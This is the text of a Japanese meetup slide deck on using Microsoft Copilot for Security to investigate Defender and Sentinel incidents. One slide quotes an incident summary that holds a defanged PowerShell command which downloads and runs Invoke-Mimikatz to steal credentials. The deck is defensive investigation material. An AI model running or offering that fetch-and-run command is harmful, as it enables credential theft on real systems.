Cyber-sec+ Meetup vol.4 Copilot for Security を使った MDE / Sentinel の ログ調査

2 自己紹介 • 国井 傑 (くにい すぐる) • 株式会社エストディアン 所属 • 公立大学法人会津大学 客員教授 • マイクロソフト認定トレーナー (1997～2025) • Microsoft MVP for Security (2006～2024) • ブログ https://AzureAD.net • 主な職務・実績 • Microsoft 365 セキュリティ/インフラ管理に関わる トレーニング • テクニカル ライター • ひと目でわかる Microsoft Defender for Endpoint • 最短突破 Microsoft Azure セキュリティテクノロジ合格教本 • ひと目でわかる Microsoft Intune など

3

4 Copilot for Security 私の利用例 Copilot for Security Microsoft Defender TI / EASM Microsoft Sentinel urlscan Microsoft Entra ID Microsoft Intune Microsoft Defender XDR Microsoft Purview プロンプトブック (想定質問集) 会社のインシデント 対応フローを実装 調査対象 不要なゲストユーザーを 見極める エラーコードの検索 インシデントの概要 特定エンティティの調査 レポート作成 過去ログの参照 脅威情報の参照 秘密度ラベルの設定変更 DLP のアラートを繰り返し 行うユーザーの追跡

5 不要なゲストユーザーを見極める

6 秘密度ラベルの変更/削除の履歴を追跡

7 インシデントの調査 ～ サンプルのインシデント

8 インシデントにアクセスすると自動的に概要情報を要約

9 ガイド付き応答による能動的なインシデント対応

10 ガイド付き応答による能動的なインシデント対応

11 インシデント レポートから概要を把握 重要度の高いインシデント「1つのエンドポイント上のMimikatz認証 情報盗難ツール」は、2024-06-10 10:18:07 UTC ～ 2024-06-10 10:18:18 UTCの間に発生しました。 クレデンシャルアクセス：2024-06-10 10:18:07 UTCにおいて、 Mimikatz認証情報盗難ツールがデバイス「xxxxx」（Windows 10）上で検出され、ユーザー「SuguruKUNII」に影響を与えました。 このツールはプロセス「cmd.exe」に関連していた。 その直後、同時に「xxxxx」上のDefenderが、コマンドライン「C:㊦ WindowsSystem32㊦WindowsPowerShell㊦v1.0」内の 「HackTool:PowerShell/Mimikatz.B」の実行を阻止した。exe powershell -c IEX(New-Object System.Net.WebClient).DownloadString(¥u0027hxxps://raw .githubusercontent.com/g4uss47/Invoke- Mimikatz/master/Invoke-Mimikatz.ps1u0027);Invoke- Mimikatz'.この操作により、「SuguruKUNII」からの認証情報の盗 難の可能性がなくなった。

12 Microsoft Defender for Office 365 x Copilot Copilot に投げてみる

13 調査結果

14 使い始めたいと思ったら覚えておくことを.. SCU と呼ばれるユニット単位で利用権を購入し、ユニットの範囲内で プロンプトが利用できます。そのコストはユニット当たり$2880と高額なので 使用しないときは Azure リソースごと削除しておきましょう

ありがとうございました